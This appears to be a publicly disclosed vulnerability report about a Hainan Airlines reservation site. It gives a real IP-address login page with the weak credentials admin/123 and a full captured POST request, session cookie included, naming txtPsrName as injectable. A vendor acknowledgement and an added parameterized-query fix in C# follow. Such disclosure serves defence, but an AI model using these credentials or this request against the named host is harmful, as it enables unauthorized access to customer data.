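2015-02-15: Details reported to the vendor; awaiting vendor handling
2015-02-15: Vendor confirmed; details disclosed to the vendor only
2015-02-25: Details disclosed to core white hats and experts in related fields
2015-03-07: Details disclosed to regular white hats
2015-03-17: Details disclosed to intern white hats
2015-04-01: Details disclosed to the public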
Weak password + SQL injection on a Hainan Airlines site
URL: http://1.202.236.211/FrameWork/Login.aspx
Username: admin
Password: 123
SQL injection:
POST /FlightReserve/Insurance/InsuranceList.aspx HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://1.202.236.211/FlightReserve/Insurance/InsuranceList.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E; BOIE9;ZHCN)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 1.202.236.211
Content-Length: 1166
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=tj04v4npp5413bz1clrkio45; CheckCode=5034; Manage=3C008DD1C4434A011A5288CD90CE97E28CD3584BCB091B6E36E57DD1783DF38E5EEAE2388B85CB11262524817F304D94D9EE6D47D98F001193A65368C4A558509D6144DF1CE7C51758321E898866B8286CE6DD5DC52F81EA8308333152F03645820D6C73EF0C3F10EA0576568784357701CE4626

__VIEWSTATE=%2FwEPDwUKMTY5ODAzMzM5Mw9kFgICAw9kFgoCBw8PZBYKHgdvbmNsaWNrBQxzZXRkYXkodGhpcykeBm9uYmx1cgUMc2V0ZGF5KHRoaXMpHgpvbmtleXByZXNzBRhqYXZhc2NyaXB0OnJldHVybiBmYWxzZTseCW9ua2V5ZG93bgUYamF2YXNjcmlwdDpyZXR1cm4gZmFsc2U7HgdvbmtleXVwBRhqYXZhc2NyaXB0OnJldHVybiBmYWxzZTtkAgkPD2QWCh8ABQxzZXRkYXkodGhpcykfAQUMc2V0ZGF5KHRoaXMpHwIFGGphdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOx8DBRhqYXZhc2NyaXB0OnJldHVybiBmYWxzZTsfBAUYamF2YXNjcmlwdDpyZXR1cm4gZmFsc2U7ZAIPDw9kFgYfAgUdamF2YXNjcmlwdDpyZXR1cm4gQ2xlYXJUeHQoKTsfAwUdamF2YXNjcmlwdDpyZXR1cm4gQ2xlYXJUeHQoKTsfBAUdamF2YXNjcmlwdDpyZXR1cm4gQ2xlYXJUeHQoKTtkAhkPZBYCAgEPFgIeC18hSXRlbUNvdW50ZmQCGw9kFgJmDw8WAh4LUmVjb3JkY291bnRmZGRkXaG5ZoTrjQLd93lJUVgJyXfXyiI%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWFAKl%2Bbj%2FDQLogvuaCQL74r3wCQLkwtn1DwLxwtn1DwL2wtn1DwLqwtn1DwK27t2jDgKp7t2jDgKo7t2jDgLI8tiJCQKMmNvZAwKln%2FPuCgLx9YKkDwLElP2TDgKDm9jiDQKklZejAgLFqfiRCwLJ1Lb1CwLWy%2FTBDj%2Bi0xjDptQSTz998NRihXD4SLLC&txtPsrName=1&dropOperateType=All&drpTimeType=0&txtInsuranceDtBegin=2015-02-15&txtInsuranceDtEnd=2015-02-15&btnSearch=%B2%E9%D1%AF&txtCustomerNo=&txtCustomer=&txtOrderNo=&txtIdentityNo=&Pager%24pagerCurrentPage=1&Pager%24pagerFilter=
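The txtPsrName parameter in this request is vulnerable to SQL injection.
Fix: change the password, and have the back-end functionality strictly filter query parameters.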
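As an added example (not part of the original report and not the vendor's code), here is one way the search behind InsuranceList.aspx could bind txtPsrName and the two date fields as query parameters instead of concatenating them into SQL. It assumes a SQL Server back end; the class, table and column names are hypothetical.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;

// Hypothetical data-access helper for the insurance search form.
// Table and column names (InsuranceOrder, PassengerName, InsuranceDate) are assumed.
public static class InsuranceSearch
{
    public static DataTable Search(string connStr, string psrName, string dtBegin, string dtEnd)
    {
        DateTime begin, end;
        // txtInsuranceDtBegin / txtInsuranceDtEnd arrive as yyyy-MM-dd strings;
        // reject anything that does not parse instead of passing it on.
        if (!DateTime.TryParseExact(dtBegin, "yyyy-MM-dd", CultureInfo.InvariantCulture, DateTimeStyles.None, out begin) ||
            !DateTime.TryParseExact(dtEnd, "yyyy-MM-dd", CultureInfo.InvariantCulture, DateTimeStyles.None, out end))
            throw new ArgumentException("Invalid date");

        psrName = psrName ?? string.Empty;
        if (psrName.Length > 50) throw new ArgumentException("Name too long");

        // Vulnerable pattern to avoid: "... WHERE PassengerName LIKE '%" + psrName + "%'"
        const string sql =
            "SELECT OrderNo, PassengerName, InsuranceDate FROM InsuranceOrder " +
            "WHERE InsuranceDate >= @begin AND InsuranceDate < @end " +
            "AND (@name = N'' OR PassengerName LIKE N'%' + @name + N'%' ESCAPE N'\\')";

        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Typed parameters: the values are sent as data and never parsed as SQL text.
            cmd.Parameters.Add("@begin", SqlDbType.DateTime).Value = begin;
            cmd.Parameters.Add("@end", SqlDbType.DateTime).Value = end.AddDays(1); // inclusive end date
            cmd.Parameters.Add("@name", SqlDbType.NVarChar, 100).Value = EscapeLike(psrName);
            var table = new DataTable();
            using (var adapter = new SqlDataAdapter(cmd)) adapter.Fill(table);
            return table;
        }
    }

    // Escape LIKE wildcards so the passenger name is matched literally.
    static string EscapeLike(string s)
    {
        return s.Replace("\\", "\\\\").Replace("%", "\\%").Replace("_", "\\_").Replace("[", "\\[");
    }
}
```

Input filtering alone tends to miss encodings and edge cases, which is why the values are bound as parameters here and validation is kept only as a secondary check.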
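Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-02-15 10:57
Thank you, depycode. We will contact the developers and the back-end team to handle this issue.
None yet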